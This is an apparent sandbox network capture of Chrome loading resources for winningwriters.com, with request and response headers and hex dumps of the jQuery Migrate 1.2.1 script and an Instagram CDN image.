                                                                                                                                                                                            2024-11-18 20:00:05 UTC8000INData Raw: 06 73 ce 4f 8b 78 49 16 ef 8d 92 85 f5 6a c2 7a c5 fd 22 6d 99 68 00 a0 65 2e ad c2 84 5d c8 bb 1c a7 d1 ac cf 76 fa 7a 7a 5c 11 99 98 e5 c8 10 60 89 58 46 2e 1c 24 99 33 74 c1 4b 80 48 e6 ec 32 98 42 ff e7 ec fc 63 9a ce cf 38 ce f6 cf 52 8f a4 34 c4 5e 62 63 e3 1f 1a 38 c3 25 a6 48 15 1c 3a 3b 97 42 cf 1e e9 09 78 9d 60 73 77 a3 0e 4b b5 5f db d0 f6 bb 2b a1 68 4b 2c 89 b3 9a 5a 16 f5 94 f6 14 52 f8 2a 01 04 dd 84 94 c4 ad 4b b0 da 9c 09 cd c6 09 61 77 91 98 ee b2 ec 9f 2d 31 26 ec 79 9e cf f7 5b 40 58 a2 f7 29 bf 0a 06 4d cc ab ef f7 f3 e3 f3 3c 72 2e 61 08 06 83 c7 92 6e 6b 42 5b 99 0c 86 dc 85 13 dd 78 27 0a bb 50 14 fc 0c f0 cc ab 95 ec 9f 5a 2c 49 72 71 f1 1c 7c 9a 93 a8 9d 43 25 de 54 ac d5 52 3a 3e bf b3 52 42 b9 7a cf 1e a4 78 37 d6 a4 8c 0c 65
                                                                                                                                                                                            Data Ascii: sOxIjz"mhe.]vzz\`XF.$3tKH2Bc8R4^bc8%H:;Bx`swK_+hK,ZR*Kaw-1&y[@X)M<r.ankB[x'PZ,Irq|C%TR:>RBzx7e
                                                                                                                                                                                            2024-11-18 20:00:05 UTC8000INData Raw: eb 1f e0 3d 5f bb 76 60 b6 32 32 bf df 47 95 d3 bb 6b 59 d0 fc 36 bd 3b 32 35 35 35 b2 d6 99 1e d9 bd 33 95 46 a7 bb e8 3a 9d 85 de d3 23 6b bb e9 b5 91 a9 d6 34 86 3e 4d d6 65 a5 47 b2 d0 cd 3b 53 bb 59 df c3 ad 5d b8 48 7f 3f 05 df 4d 77 be 57 04 fb a0 28 0b 08 c3 6f 6d 99 c5 c5 b4 f2 54 27 1f 98 02 ba 07 48 b8 91 3b ec a3 59 83 5b 65 19 52 50 54 84 23 59 35 67 b0 28 a8 dc 0e 33 4b bb 3b 56 7d 2e aa c9 1d a2 d1 3a 5d 40 4b 99 7c b8 b7 6e 2f c4 aa 73 30 d0 39 bd 35 12 74 cb 6d d1 b1 cf 86 74 ab 0a a3 92 8d e8 dc a1 25 9d 12 94 5a c9 d2 c1 21 e4 5f d7 e4 20 49 a7 e9 13 3a b1 a5 d7 a5 38 6d a3 de 8a 29 b5 77 96 4b fd 17 90 e1 0a 50 26 24 5f 87 94 af 8a 7a 6b 66 37 0a b7 04 82 11 15 e7 b9 69 e9 a4 53 1f 27 cb c4 59 c6 22 7b c5 39 7a 05 67 6e 15 17 67 0a 1e
                                                                                                                                                                                            Data Ascii: =_v`22GkY6;25553F:#k4>MeG;SY]H?MwW(omT'H;Y[eRPT#Y5g(3K;V}.:]@K|n/s095tmt%Z!_ I:8m)wKP&$_zkf7iS'Y"{9zgng


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                            12192.168.2.1649728151.101.66.1374436732C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            2024-11-18 20:00:06 UTC540OUTGET /jquery-migrate-1.2.1.js HTTP/1.1
                                                                                                                                                                                            Host: code.jquery.com
                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                            sec-ch-ua-mobile: ?0
                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                            sec-ch-ua-platform: "Windows"
                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                            Sec-Fetch-Site: cross-site
                                                                                                                                                                                            Sec-Fetch-Mode: no-cors
                                                                                                                                                                                            Sec-Fetch-Dest: script
                                                                                                                                                                                            Referer: https://winningwriters.com/
                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                            2024-11-18 20:00:06 UTC566INHTTP/1.1 200 OK
                                                                                                                                                                                            Connection: close
                                                                                                                                                                                            Content-Length: 16621
                                                                                                                                                                                            Server: nginx
                                                                                                                                                                                            Content-Type: application/javascript; charset=utf-8
                                                                                                                                                                                            Last-Modified: Fri, 18 Oct 1991 12:00:00 GMT
                                                                                                                                                                                            ETag: "28feccc0-40ed"
                                                                                                                                                                                            Cache-Control: public, max-age=31536000, stale-while-revalidate=604800
                                                                                                                                                                                            Access-Control-Allow-Origin: *
                                                                                                                                                                                            Via: 1.1 varnish, 1.1 varnish
                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                            Age: 549809
                                                                                                                                                                                            Date: Mon, 18 Nov 2024 20:00:06 GMT
                                                                                                                                                                                            X-Served-By: cache-lga21971-LGA, cache-dfw-kdal2120092-DFW
                                                                                                                                                                                            X-Cache: HIT, HIT
                                                                                                                                                                                            X-Cache-Hits: 864, 0
                                                                                                                                                                                            X-Timer: S1731960006.411560,VS0,VE1
                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                            2024-11-18 20:00:06 UTC1378INData Raw: 2f 2a 21 0a 20 2a 20 6a 51 75 65 72 79 20 4d 69 67 72 61 74 65 20 2d 20 76 31 2e 32 2e 31 20 2d 20 32 30 31 33 2d 30 35 2d 30 38 0a 20 2a 20 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 63 6f 6d 2f 6a 71 75 65 72 79 2f 6a 71 75 65 72 79 2d 6d 69 67 72 61 74 65 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 32 30 30 35 2c 20 32 30 31 33 20 6a 51 75 65 72 79 20 46 6f 75 6e 64 61 74 69 6f 6e 2c 20 49 6e 63 2e 20 61 6e 64 20 6f 74 68 65 72 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 3b 20 4c 69 63 65 6e 73 65 64 20 4d 49 54 0a 20 2a 2f 0a 28 66 75 6e 63 74 69 6f 6e 28 20 6a 51 75 65 72 79 2c 20 77 69 6e 64 6f 77 2c 20 75 6e 64 65 66 69 6e 65 64 20 29 20 7b 0a 2f 2f 20 53 65 65 20 68 74 74 70 3a 2f 2f 62 75 67 73 2e 6a 71 75 65 72 79 2e 63 6f 6d 2f 74 69 63 6b 65 74 2f
                                                                                                                                                                                            Data Ascii: /*! * jQuery Migrate - v1.2.1 - 2013-05-08 * https://github.com/jquery/jquery-migrate * Copyright 2005, 2013 jQuery Foundation, Inc. and other contributors; Licensed MIT */(function( jQuery, window, undefined ) {// See http://bugs.jquery.com/ticket/
                                                                                                                                                                                            2024-11-18 20:00:06 UTC1378INData Raw: 7b 0a 09 09 2f 2f 20 4f 6e 20 45 53 35 20 62 72 6f 77 73 65 72 73 20 28 6e 6f 6e 2d 6f 6c 64 49 45 29 2c 20 77 61 72 6e 20 69 66 20 74 68 65 20 63 6f 64 65 20 74 72 69 65 73 20 74 6f 20 67 65 74 20 70 72 6f 70 3b 0a 09 09 2f 2f 20 61 6c 6c 6f 77 20 70 72 6f 70 65 72 74 79 20 74 6f 20 62 65 20 6f 76 65 72 77 72 69 74 74 65 6e 20 69 6e 20 63 61 73 65 20 73 6f 6d 65 20 6f 74 68 65 72 20 70 6c 75 67 69 6e 20 77 61 6e 74 73 20 69 74 0a 09 09 74 72 79 20 7b 0a 09 09 09 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 79 28 20 6f 62 6a 2c 20 70 72 6f 70 2c 20 7b 0a 09 09 09 09 63 6f 6e 66 69 67 75 72 61 62 6c 65 3a 20 74 72 75 65 2c 0a 09 09 09 09 65 6e 75 6d 65 72 61 62 6c 65 3a 20 74 72 75 65 2c 0a 09 09 09 09 67 65 74 3a 20 66 75 6e 63 74 69 6f 6e
                                                                                                                                                                                            Data Ascii: {// On ES5 browsers (non-oldIE), warn if the code tries to get prop;// allow property to be overwritten in case some other plugin wants ittry {Object.defineProperty( obj, prop, {configurable: true,enumerable: true,get: function
                                                                                                                                                                                            2024-11-18 20:00:06 UTC1378INData Raw: 72 6f 70 28 20 6a 51 75 65 72 79 2c 20 22 61 74 74 72 46 6e 22 2c 20 61 74 74 72 46 6e 20 7c 7c 20 7b 7d 2c 20 22 6a 51 75 65 72 79 2e 61 74 74 72 46 6e 20 69 73 20 64 65 70 72 65 63 61 74 65 64 22 20 29 3b 0a 0a 6a 51 75 65 72 79 2e 61 74 74 72 20 3d 20 66 75 6e 63 74 69 6f 6e 28 20 65 6c 65 6d 2c 20 6e 61 6d 65 2c 20 76 61 6c 75 65 2c 20 70 61 73 73 20 29 20 7b 0a 09 76 61 72 20 6c 6f 77 65 72 4e 61 6d 65 20 3d 20 6e 61 6d 65 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 2c 0a 09 09 6e 54 79 70 65 20 3d 20 65 6c 65 6d 20 26 26 20 65 6c 65 6d 2e 6e 6f 64 65 54 79 70 65 3b 0a 0a 09 69 66 20 28 20 70 61 73 73 20 29 20 7b 0a 09 09 2f 2f 20 53 69 6e 63 65 20 70 61 73 73 20 69 73 20 75 73 65 64 20 69 6e 74 65 72 6e 61 6c 6c 79 2c 20 77 65 20 6f 6e 6c 79 20 77 61
                                                                                                                                                                                            Data Ascii: rop( jQuery, "attrFn", attrFn || {}, "jQuery.attrFn is deprecated" );jQuery.attr = function( elem, name, value, pass ) {var lowerName = name.toLowerCase(),nType = elem && elem.nodeType;if ( pass ) {// Since pass is used internally, we only wa
                                                                                                                                                                                            2024-11-18 20:00:06 UTC1378INData Raw: 3d 20 74 72 75 65 20 7c 7c 20 74 79 70 65 6f 66 20 70 72 6f 70 65 72 74 79 20 21 3d 3d 20 22 62 6f 6f 6c 65 61 6e 22 20 26 26 0a 09 09 09 09 09 28 20 61 74 74 72 4e 6f 64 65 20 3d 20 65 6c 65 6d 2e 67 65 74 41 74 74 72 69 62 75 74 65 4e 6f 64 65 28 6e 61 6d 65 29 20 29 20 26 26 20 61 74 74 72 4e 6f 64 65 2e 6e 6f 64 65 56 61 6c 75 65 20 21 3d 3d 20 66 61 6c 73 65 20 3f 0a 0a 09 09 09 09 09 6e 61 6d 65 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 20 3a 0a 09 09 09 09 09 75 6e 64 65 66 69 6e 65 64 3b 0a 09 09 09 7d 2c 0a 09 09 09 73 65 74 3a 20 66 75 6e 63 74 69 6f 6e 28 20 65 6c 65 6d 2c 20 76 61 6c 75 65 2c 20 6e 61 6d 65 20 29 20 7b 0a 09 09 09 09 76 61 72 20 70 72 6f 70 4e 61 6d 65 3b 0a 09 09 09 09 69 66 20 28 20 76 61 6c 75 65 20 3d 3d 3d 20 66 61 6c 73
                                                                                                                                                                                            Data Ascii: = true || typeof property !== "boolean" &&( attrNode = elem.getAttributeNode(name) ) && attrNode.nodeValue !== false ?name.toLowerCase() :undefined;},set: function( elem, value, name ) {var propName;if ( value === fals
                                                                                                                                                                                            2024-11-18 20:00:06 UTC1378INData Raw: 75 65 72 79 2e 66 6e 2e 61 74 74 72 28 27 76 61 6c 75 65 27 29 20 6e 6f 20 6c 6f 6e 67 65 72 20 67 65 74 73 20 70 72 6f 70 65 72 74 69 65 73 22 29 3b 0a 09 09 7d 0a 09 09 72 65 74 75 72 6e 20 6e 61 6d 65 20 69 6e 20 65 6c 65 6d 20 3f 0a 09 09 09 65 6c 65 6d 2e 76 61 6c 75 65 20 3a 0a 09 09 09 6e 75 6c 6c 3b 0a 09 7d 2c 0a 09 73 65 74 3a 20 66 75 6e 63 74 69 6f 6e 28 20 65 6c 65 6d 2c 20 76 61 6c 75 65 20 29 20 7b 0a 09 09 76 61 72 20 6e 6f 64 65 4e 61 6d 65 20 3d 20 28 20 65 6c 65 6d 2e 6e 6f 64 65 4e 61 6d 65 20 7c 7c 20 22 22 20 29 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 3b 0a 09 09 69 66 20 28 20 6e 6f 64 65 4e 61 6d 65 20 3d 3d 3d 20 22 62 75 74 74 6f 6e 22 20 29 20 7b 0a 09 09 09 72 65 74 75 72 6e 20 76 61 6c 75 65 41 74 74 72 53 65 74 2e 61 70 70
                                                                                                                                                                                            Data Ascii: uery.fn.attr('value') no longer gets properties");}return name in elem ?elem.value :null;},set: function( elem, value ) {var nodeName = ( elem.nodeName || "" ).toLowerCase();if ( nodeName === "button" ) {return valueAttrSet.app
                                                                                                                                                                                            2024-11-18 20:00:06 UTC1378INData Raw: 75 6c 64 20 77 6f 72 6b 2e 0a 09 09 69 66 20 28 20 6d 61 74 63 68 5b 20 30 20 5d 2e 63 68 61 72 41 74 28 20 30 20 29 20 3d 3d 3d 20 22 23 22 20 29 20 7b 0a 09 09 09 6d 69 67 72 61 74 65 57 61 72 6e 28 22 48 54 4d 4c 20 73 74 72 69 6e 67 20 63 61 6e 6e 6f 74 20 73 74 61 72 74 20 77 69 74 68 20 61 20 27 23 27 20 63 68 61 72 61 63 74 65 72 22 29 3b 0a 09 09 09 6a 51 75 65 72 79 2e 65 72 72 6f 72 28 22 4a 51 4d 49 47 52 41 54 45 3a 20 49 6e 76 61 6c 69 64 20 73 65 6c 65 63 74 6f 72 20 73 74 72 69 6e 67 20 28 58 53 53 29 22 29 3b 0a 09 09 7d 0a 09 09 2f 2f 20 4e 6f 77 20 70 72 6f 63 65 73 73 20 75 73 69 6e 67 20 6c 6f 6f 73 65 20 72 75 6c 65 73 3b 20 6c 65 74 20 70 72 65 2d 31 2e 38 20 70 6c 61 79 20 74 6f 6f 0a 09 09 69 66 20 28 20 63 6f 6e 74 65 78 74 20 26
                                                                                                                                                                                            Data Ascii: uld work.if ( match[ 0 ].charAt( 0 ) === "#" ) {migrateWarn("HTML string cannot start with a '#' character");jQuery.error("JQMIGRATE: Invalid selector string (XSS)");}// Now process using loose rules; let pre-1.8 play tooif ( context &
                                                                                                                                                                                            2024-11-18 20:00:06 UTC1378INData Raw: 65 72 41 67 65 6e 74 20 29 3b 0a 09 62 72 6f 77 73 65 72 20 3d 20 7b 7d 3b 0a 0a 09 69 66 20 28 20 6d 61 74 63 68 65 64 2e 62 72 6f 77 73 65 72 20 29 20 7b 0a 09 09 62 72 6f 77 73 65 72 5b 20 6d 61 74 63 68 65 64 2e 62 72 6f 77 73 65 72 20 5d 20 3d 20 74 72 75 65 3b 0a 09 09 62 72 6f 77 73 65 72 2e 76 65 72 73 69 6f 6e 20 3d 20 6d 61 74 63 68 65 64 2e 76 65 72 73 69 6f 6e 3b 0a 09 7d 0a 0a 09 2f 2f 20 43 68 72 6f 6d 65 20 69 73 20 57 65 62 6b 69 74 2c 20 62 75 74 20 57 65 62 6b 69 74 20 69 73 20 61 6c 73 6f 20 53 61 66 61 72 69 2e 0a 09 69 66 20 28 20 62 72 6f 77 73 65 72 2e 63 68 72 6f 6d 65 20 29 20 7b 0a 09 09 62 72 6f 77 73 65 72 2e 77 65 62 6b 69 74 20 3d 20 74 72 75 65 3b 0a 09 7d 20 65 6c 73 65 20 69 66 20 28 20 62 72 6f 77 73 65 72 2e 77 65 62 6b
                                                                                                                                                                                            Data Ascii: erAgent );browser = {};if ( matched.browser ) {browser[ matched.browser ] = true;browser.version = matched.version;}// Chrome is Webkit, but Webkit is also Safari.if ( browser.chrome ) {browser.webkit = true;} else if ( browser.webk
                                                                                                                                                                                            2024-11-18 20:00:06 UTC1378INData Raw: 61 6d 65 20 29 20 7b 0a 09 76 61 72 20 72 65 74 2c 20 65 76 74 2c 0a 09 09 65 6c 65 6d 20 3d 20 74 68 69 73 5b 30 5d 3b 0a 0a 09 2f 2f 20 48 61 6e 64 6c 65 73 20 31 2e 37 20 77 68 69 63 68 20 68 61 73 20 74 68 69 73 20 62 65 68 61 76 69 6f 72 20 61 6e 64 20 31 2e 38 20 77 68 69 63 68 20 64 6f 65 73 6e 27 74 0a 09 69 66 20 28 20 65 6c 65 6d 20 26 26 20 6e 61 6d 65 20 3d 3d 3d 20 22 65 76 65 6e 74 73 22 20 26 26 20 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 20 3d 3d 3d 20 31 20 29 20 7b 0a 09 09 72 65 74 20 3d 20 6a 51 75 65 72 79 2e 64 61 74 61 28 20 65 6c 65 6d 2c 20 6e 61 6d 65 20 29 3b 0a 09 09 65 76 74 20 3d 20 6a 51 75 65 72 79 2e 5f 64 61 74 61 28 20 65 6c 65 6d 2c 20 6e 61 6d 65 20 29 3b 0a 09 09 69 66 20 28 20 28 20 72 65 74 20 3d 3d 3d 20 75
                                                                                                                                                                                            Data Ascii: ame ) {var ret, evt,elem = this[0];// Handles 1.7 which has this behavior and 1.8 which doesn'tif ( elem && name === "events" && arguments.length === 1 ) {ret = jQuery.data( elem, name );evt = jQuery._data( elem, name );if ( ( ret === u
                                                                                                                                                                                            2024-11-18 20:00:06 UTC1378INData Raw: 69 64 65 72 20 69 74 20 65 78 65 63 75 74 61 62 6c 65 0a 09 09 09 09 69 66 20 28 20 21 65 6c 65 6d 2e 74 79 70 65 20 7c 7c 20 72 73 63 72 69 70 74 54 79 70 65 2e 74 65 73 74 28 20 65 6c 65 6d 2e 74 79 70 65 20 29 20 29 20 7b 0a 09 09 09 09 09 2f 2f 20 44 65 74 61 63 68 20 74 68 65 20 73 63 72 69 70 74 20 61 6e 64 20 73 74 6f 72 65 20 69 74 20 69 6e 20 74 68 65 20 73 63 72 69 70 74 73 20 61 72 72 61 79 20 28 69 66 20 70 72 6f 76 69 64 65 64 29 20 6f 72 20 74 68 65 20 66 72 61 67 6d 65 6e 74 0a 09 09 09 09 09 2f 2f 20 52 65 74 75 72 6e 20 74 72 75 74 68 79 20 74 6f 20 69 6e 64 69 63 61 74 65 20 74 68 61 74 20 69 74 20 68 61 73 20 62 65 65 6e 20 68 61 6e 64 6c 65 64 0a 09 09 09 09 09 72 65 74 75 72 6e 20 73 63 72 69 70 74 73 20 3f 0a 09 09 09 09 09 09 73 63
                                                                                                                                                                                            Data Ascii: ider it executableif ( !elem.type || rscriptType.test( elem.type ) ) {// Detach the script and store it in the scripts array (if provided) or the fragment// Return truthy to indicate that it has been handledreturn scripts ?sc
                                                                                                                                                                                            2024-11-18 20:00:06 UTC1378INData Raw: 6f 6d 70 6c 65 74 65 7c 61 6a 61 78 45 72 72 6f 72 7c 61 6a 61 78 53 75 63 63 65 73 73 22 2c 0a 09 72 61 6a 61 78 45 76 65 6e 74 20 3d 20 6e 65 77 20 52 65 67 45 78 70 28 20 22 5c 5c 62 28 3f 3a 22 20 2b 20 61 6a 61 78 45 76 65 6e 74 73 20 2b 20 22 29 5c 5c 62 22 20 29 2c 0a 09 72 68 6f 76 65 72 48 61 63 6b 20 3d 20 2f 28 3f 3a 5e 7c 5c 73 29 68 6f 76 65 72 28 5c 2e 5c 53 2b 7c 29 5c 62 2f 2c 0a 09 68 6f 76 65 72 48 61 63 6b 20 3d 20 66 75 6e 63 74 69 6f 6e 28 20 65 76 65 6e 74 73 20 29 20 7b 0a 09 09 69 66 20 28 20 74 79 70 65 6f 66 28 20 65 76 65 6e 74 73 20 29 20 21 3d 3d 20 22 73 74 72 69 6e 67 22 20 7c 7c 20 6a 51 75 65 72 79 2e 65 76 65 6e 74 2e 73 70 65 63 69 61 6c 2e 68 6f 76 65 72 20 29 20 7b 0a 09 09 09 72 65 74 75 72 6e 20 65 76 65 6e 74 73 3b
                                                                                                                                                                                            Data Ascii: omplete|ajaxError|ajaxSuccess",rajaxEvent = new RegExp( "\\b(?:" + ajaxEvents + ")\\b" ),rhoverHack = /(?:^|\s)hover(\.\S+|)\b/,hoverHack = function( events ) {if ( typeof( events ) !== "string" || jQuery.event.special.hover ) {return events;


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                            13192.168.2.1649730157.240.249.634436732C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            2024-11-18 20:00:06 UTC858OUTGET /v/t51.2885-15/466498990_932073868801787_4615250428975556945_n.jpg?_nc_cat=108&ccb=1-7&_nc_sid=18de74&_nc_ohc=K2QYvU4QDFwQ7kNvgHexzPp&_nc_zt=23&_nc_ht=scontent-ord5-1.cdninstagram.com&edm=AL-3X8kEAAAA&oh=00_AYB6H6C6vXmQz4o0NOzYmapDE6_aoksGSCqZ4e0xcfBfbw&oe=6741529C HTTP/1.1
                                                                                                                                                                                            Host: scontent-ord5-1.cdninstagram.com
                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                            sec-ch-ua-mobile: ?0
                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                            sec-ch-ua-platform: "Windows"
                                                                                                                                                                                            Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                            Sec-Fetch-Site: cross-site
                                                                                                                                                                                            Sec-Fetch-Mode: no-cors
                                                                                                                                                                                            Sec-Fetch-Dest: image
                                                                                                                                                                                            Referer: https://winningwriters.com/
                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                            2024-11-18 20:00:06 UTC583INHTTP/1.1 200 OK
                                                                                                                                                                                            x-additional-error-detail:
                                                                                                                                                                                            Last-Modified: Mon, 11 Nov 2024 20:01:38 GMT
                                                                                                                                                                                            Content-Type: image/jpeg
                                                                                                                                                                                            X-Needle-Checksum: 2844738950
                                                                                                                                                                                            content-digest: adler32=2844738950
                                                                                                                                                                                            cross-origin-resource-policy: cross-origin
                                                                                                                                                                                            timing-allow-origin: *
                                                                                                                                                                                            Access-Control-Allow-Origin: *
                                                                                                                                                                                            Cache-Control: max-age=1209600, no-transform
                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                            Date: Mon, 18 Nov 2024 20:00:06 GMT
                                                                                                                                                                                            X-FB-Connection-Quality: EXCELLENT; q=0.9, rtt=22, rtx=0, c=13, mss=1380, tbw=3356, tp=-1, tpl=-1, uplat=0, ullat=-1
                                                                                                                                                                                            Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                            Connection: close
                                                                                                                                                                                            Content-Length: 228898
                                                                                                                                                                                            2024-11-18 20:00:06 UTC1INData Raw: ff
                                                                                                                                                                                            Data Ascii:
                                                                                                                                                                                            2024-11-18 20:00:06 UTC1500INData Raw: d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 43 00 04 03 03 04 03 03 04 04 03 04 05 04 04 05 06 0a 07 06 06 06 06 0d 09 0a 08 0a 0f 0d 10 10 0f 0d 0f 0e 11 13 18 14 11 12 17 12 0e 0f 15 1c 15 17 19 19 1b 1b 1b 10 14 1d 1f 1d 1a 1f 18 1a 1b 1a ff db 00 43 01 04 05 05 06 05 06 0c 07 07 0c 1a 11 0f 11 1a 1a 1a 1a 1a 1a 1a 1a 1a 1a 1a 1a 1a 1a 1a 1a 1a 1a 1a 1a 1a 1a 1a 1a 1a 1a 1a 1a 1a 1a 1a 1a 1a 1a 1a 1a 1a 1a 1a 1a 1a 1a 1a 1a 1a 1a 1a 1a 1a 1a ff c0 00 11 08 04 38 04 38 03 01 22 00 02 11 01 03 11 01 ff c4 00 1f 00 00 01 05 01 01 01 01 01 01 00 00 00 00 00 00 00 00 01 02 03 04 05 06 07 08 09 0a 0b ff c4 00 b5 10 00 02 01 03 03 02 04 03 05 05 04 04 00 00 01 7d 01 02 03 00 04 11 05 12 21 31 41 06 13 51 61 07 22 71 14 32 81 91 a1 08 23
                                                                                                                                                                                            Data Ascii: JFIFCC88"}!1AQa"q2#
                                                                                                                                                                                            2024-11-18 20:00:06 UTC4096INData Raw: ed 25 6f f8 5e d7 c3 b7 3a f1 87 c5 97 97 76 9a 4e d6 c4 f6 c8 19 f7 67 e5 c8 23 a6 33 5e d1 e1 4f 84 5f 0b 7c 69 7b f6 3d 03 c5 fa 94 d7 5b 4b 08 5c 2a 39 03 ae 32 9c fe 15 c9 43 05 53 11 a4 1a bf 6b a4 cf 57 19 9a d1 c0 eb 56 32 b5 af 75 16 d7 de 8f 9e 29 79 af af bf e1 92 7c 32 a0 97 d6 75 52 3f de 8f ff 00 88 af 36 d7 7c 0d f0 77 46 5b 98 7f e1 31 d4 a7 bb 89 58 04 88 07 f9 c7 6c 88 f1 d7 de ba ea 65 38 8a 2a f5 1a 5e ad 1e 65 0e 26 c1 62 a5 cb 49 4a 4f ca 2d 9e 13 4b 5d 3f 82 ac fc 29 79 aa 4f 1f 8d f5 0b eb 0b 10 9f ba 92 d6 35 62 5b 3f c5 90 70 31 e8 2b e8 1f 0e fe ce 7e 01 f1 86 97 1e a5 e1 cf 11 6a 77 76 8e 4a ef 0d 18 c1 1d 41 05 32 0d 73 61 b0 15 71 4b f7 6d 5f b5 f5 3b 71 f9 d6 1b 2e 76 ac a4 97 7e 57 6f bc f9 5b a5 15 f4 bf 88 be 06 fc 32 f0
                                                                                                                                                                                            Data Ascii: %o^:vNg#3^O_|i{=[K\*92CSkWV2u)y|2uR?6|wF[1Xle8*^e&bIJO-K]?)yO5b[?p1+~jwvJA2saqKm_;q.v~Wo[2
                                                                                                                                                                                            2024-11-18 20:00:06 UTC4096INData Raw: 97 ff 00 47 c1 5f 64 7f 66 59 7f cf 9d bf fd fa 5f f0 a9 21 b3 b7 b7 62 d0 5b c5 13 11 82 51 02 9c 7e 15 e9 43 09 c9 25 2e 6d 8e 59 56 e6 8d ac 7e 72 fc 57 ff 00 92 9d e3 0f fb 0c 5d 7f e8 d6 af 40 fd 94 bf e4 a9 9f fb 06 4f fc d2 bc ff 00 e2 bf fc 94 ef 18 7f d8 62 eb ff 00 46 b5 7a 07 ec a5 ff 00 25 4c ff 00 d8 32 7f e6 95 c5 4f f8 eb d4 e8 97 f0 fe 47 a4 fe d8 bf f2 02 f0 b7 fd 7d cf ff 00 a0 2d 7c 8d 5f 5c fe d8 bf f2 02 f0 b7 fd 7d cf ff 00 a0 2d 7c 8d 4f 15 fc 56 2a 3f 02 3e a4 fd 95 fe 29 f9 6e de 07 d6 e6 f9 58 b4 ba 53 b9 e8 7a bc 3f 8f 2c 3f e0 43 b8 af ab 2b f2 da ca f6 e3 4e bc b7 bc b0 99 ed ee ad e4 59 61 95 0e 19 1d 4e 41 07 d4 11 5f a1 bf 08 fe 23 5b fc 4b f0 7d b6 a6 a5 13 51 87 10 ea 10 2f f0 4c 07 24 0f ee b7 de 1f 5c 75 06 bb 30 95 b9
                                                                                                                                                                                            Data Ascii: G_dfY_!b[Q~C%.mYV~rW]@ObFz%L2OG}-|_\}-|OV*?>)nXSz?,?C+NYaNA_#[K}Q/L$\u0
                                                                                                                                                                                            2024-11-18 20:00:06 UTC4096INData Raw: f5 d3 a9 07 42 4a 71 14 24 aa 45 a6 7e 97 eb 17 11 5d 78 6a fe 7b 69 16 68 25 b1 91 e3 91 0e 55 94 c6 48 20 f7 04 57 e6 25 7d 51 fb 3c fc 52 fe d1 f0 a6 ab e0 9d 6e 6c dd 5a 58 cf 26 98 ee 79 92 20 84 b4 5f 55 ea 3f d9 cf 65 af 95 ea f1 35 15 48 c6 48 54 a2 e0 da 67 d6 3f b1 bf fc 83 fc 5d ff 00 5d ad 7f f4 19 2b c7 bf 68 7d 59 f5 6f 8b be 21 2c c4 c7 6a f1 db 46 09 fb a1 23 50 7f f1 ed c7 f1 af 61 fd 8d ff 00 e4 1f e2 ef fa ed 6b ff 00 a0 c9 5e 17 f1 ae 16 83 e2 bf 8b 12 4c e4 df bb f3 e8 c0 30 fd 08 a2 a3 ff 00 67 88 47 f8 8c a9 f0 9f c2 d1 78 cf e2 27 87 f4 6b a5 df 6b 3d ce fb 85 fe f4 51 a9 77 5f c5 54 8f c6 bf 47 51 16 35 54 45 0a aa 30 00 18 00 7a 57 c0 ff 00 b3 75 d4 76 bf 18 74 1f 38 85 12 ad c4 6a 4f f7 8c 2f 8f cf 18 fc 6b ef 9a e9 c1 25 c8 df
                                                                                                                                                                                            Data Ascii: BJq$E~]xj{ih%UH W%}Q<RnlZX&y _U?e5HHTg?]]+h}Yo!,jF#Pak^L0gGx'kk=Qw_TGQ5TE0zWuvt8jO/k%
